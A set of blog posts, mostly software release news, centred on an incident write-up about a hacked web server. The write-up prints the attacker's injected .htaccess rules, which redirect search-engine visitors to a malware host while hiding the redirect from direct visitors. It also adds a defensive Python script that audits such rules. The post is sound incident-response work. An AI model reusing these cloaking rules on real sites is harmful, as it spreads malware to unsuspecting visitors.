
WOOT'09 Call For Papers


WOOT is the Workshop on Offensive Technologies. This year, it's being held for the third time and the call for papers just came out. Submissions are solicited for a variety of interesting topics including:

  • Vulnerability research (software auditing, reverse engineering)
  • Exploit techniques and automation
  • Malware design and implementation (rootkits, viruses, bots, worms)

The last two years were a lot of fun and this year's organizers are an eclectic bunch of well-known folks. If you have anything in the works, go submit it and we will see you at the workshop.
Categories: News, SpyBye, Systrace

Systrace 1.6g released

This release contains a number of small bug fixes:

- 32-bit compilation has been fixed
- 32-bit policies are no longer created as Linux64 when running on a 64-bit system

The source code can be downloaded here [sig].
Categories: News, Systrace

Anvil Setup

[Photo: Anvil and Forge]

I got to set up the anvil today and spent a few minutes hammering hot metal. The construction for the anvil stand is from Mark Asprey's book. Joe welded the anvil stand for me and even though the feet are not the same size, it turned out to be surprisingly level. The 165 pound anvil is bolted on top of four layers of plywood. It's reasonably solid but moves a little bit when hit hard.

Categories: Hacking, News

Systrace 1.6f with 64-bit Linux ptrace support

A new version of Systrace that supports 64-bit Linux installations can be downloaded from here. The major changes are support of 64-bit Linux with ptrace as well as 32-bit binaries under a 64-bit system. Let me know if you run into any issues with this.
Categories: News, Systrace

Libevent 1.4.9-stable released

We just released libevent 1.4.9-stable. You can download the source from the usual place:

http://monkey.org/~provos/libevent-1.4.9-stable.tar.gz
This release fixes a number of bugs:
  • fixed several memory leaks in the HTTP layer.
  • fixed signal handling for multi-threaded applications.
  • fixed issues with the timer cache when leaving/entering the event loop.
Check here for a more detailed change list.

Thanks to Dean McNamee, Victor Chang, Alejo Sanchez, Richard Jones, Robin Haberkorn and everyone else who reported bugs or supplied patches.
Categories: Libevent, News

Using htaccess To Distribute Malware

Usually, I get to find compromised web servers, but last week I was asked to fix one. A relative noticed that his web server would try to install a rogue anti-malware product and called me for help. Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar. A little investigation with curl could reproduce that behavior:
curl -I -H "Referer: www.google.com" http://www.foo.com/

returned a 302 redirect to an IP address, whereas
curl -I http://www.foo.com/

returned a 200. To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in .htaccess:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

These directives tell Apache to issue an external redirect (the R flag, a 302 by default) to the attacker's site for any request whose Referer header contains one of the search-engine names. The patterns are unanchored at the start and case-insensitive (NC), the OR flags chain the conditions so that a single match is enough, and L stops further rewriting. Visitors who type the address directly send no Referer, so none of the conditions match and the site looks clean; only search-engine traffic, and anyone crawling with a search-engine Referer, gets sent to the malware.

The attackers were able to insert this file as the web application had a remote file inclusion vulnerability. These attacks are quite popular as we found in our paper: To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads. The fix in this case was to remove the .htaccess file and to upgrade the web application to a patched version without the vulnerability.
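To make the behaviour of such a rule set explicit and repeatable, here is an added example (not code from the original post) that parses the injected mod_rewrite directives, evaluates them the way Apache groups [OR] conditions for a given Referer, models the curl -I check as a function call instead of a live request, and flags rules that send referer-gated visitors to another host. The .htaccess text is the one quoted above, embedded as constructed test input; the site host www.foo.com and the sample Referer values are assumptions. It goes slightly beyond the post by handling negated conditions (a leading !) and AND/OR grouping, since real injected rule sets often mix them.

```python
"""Audit a referer-cloaking .htaccess (added example, not the post's own code)."""
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample input: the rule set quoted in the post.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]
"""


def parse_flags(token):
    """'[NC,OR]' -> {'NC', 'OR'}; valued flags such as R=301 keep only the name."""
    if not (token.startswith("[") and token.endswith("]")):
        return set()
    return {f.split("=", 1)[0].upper() for f in token[1:-1].split(",") if f}


def parse_htaccess(text):
    """Return a list of (conditions, pattern, target, flags) tuples.

    Each condition is (variable, regex, flags). Only RewriteCond and
    RewriteRule are understood; other directives are skipped.
    """
    rules, pending = [], []
    for raw in text.splitlines():
        parts = raw.strip().split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        flags = parse_flags(parts[3]) if len(parts) > 3 else set()
        if parts[0].lower() == "rewritecond":
            pending.append((parts[1], parts[2], flags))
        elif parts[0].lower() == "rewriterule":
            rules.append((pending, parts[1], parts[2], flags))
            pending = []  # conditions bind to the next RewriteRule only
    return rules


def cond_matches(cond, env):
    """Evaluate one RewriteCond against a dict of request variables."""
    var, regex, flags = cond
    value = env.get(var.strip("%{}"), "")
    negate = regex.startswith("!")
    if negate:
        regex = regex[1:]
    re_flags = re.IGNORECASE if "NC" in flags else 0
    hit = re.search(regex, value, re_flags) is not None
    return hit != negate


def conds_satisfied(conds, env):
    """Apache ORs consecutive [OR] conditions into a group; groups are ANDed."""
    groups, current = [], []
    for cond in conds:
        current.append(cond)
        if "OR" not in cond[2]:
            groups.append(current)
            current = []
    if current:  # trailing [OR] without a closing condition
        groups.append(current)
    return all(any(cond_matches(c, env) for c in group) for group in groups)


def evaluate(rules, path, env):
    """Return the target of the first rule that matches, else None."""
    for conds, pattern, target, flags in rules:
        re_flags = re.IGNORECASE if "NC" in flags else 0
        if re.search(pattern, path, re_flags) and conds_satisfied(conds, env):
            return target
    return None


def probe(rules, referer, path=""):
    """Model the curl -I check: (302, Location) when cloaked, (200, None) otherwise."""
    env = {"HTTP_REFERER": referer} if referer else {}
    target = evaluate(rules, path, env)
    return (302, target) if target else (200, None)


def suspicious_rules(rules, site_host):
    """Flag rules that push referer-gated visitors to another host or a bare IP."""
    findings = []
    for conds, pattern, target, flags in rules:
        host = urlparse(target).hostname
        if not host or host.lower() == site_host.lower():
            continue  # relative or same-site rewrite, not off-site cloaking
        referer_gated = any(c[0].upper() == "%{HTTP_REFERER}" for c in conds)
        try:
            ip_address(host)
            bare_ip = True
        except ValueError:
            bare_ip = False
        if referer_gated or bare_ip:
            findings.append({"target": target, "referer_gated": referer_gated,
                             "bare_ip": bare_ip})
    return findings


if __name__ == "__main__":
    rules = parse_htaccess(SAMPLE_HTACCESS)
    for ref in (None, "http://www.google.com/search?q=foo", "http://www.example.org/"):
        print(ref, "->", probe(rules, ref))
    print(suspicious_rules(rules, "www.foo.com"))
```

Two things worth noticing when running it: a request with no Referer gets the clean 200, exactly as the post observed, and because `.*ask.*$` is an unanchored substring match, a Referer such as http://www.basket.example/ is cloaked too, so a scanner that only sends a Google Referer underestimates who is affected. Running `suspicious_rules` over every .htaccess under a document root is a cheap triage step after a compromise, but it only catches this one persistence trick; the remote file inclusion that let the attacker write the file can just as easily have dropped other files.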
Categories: Malware, SpyBye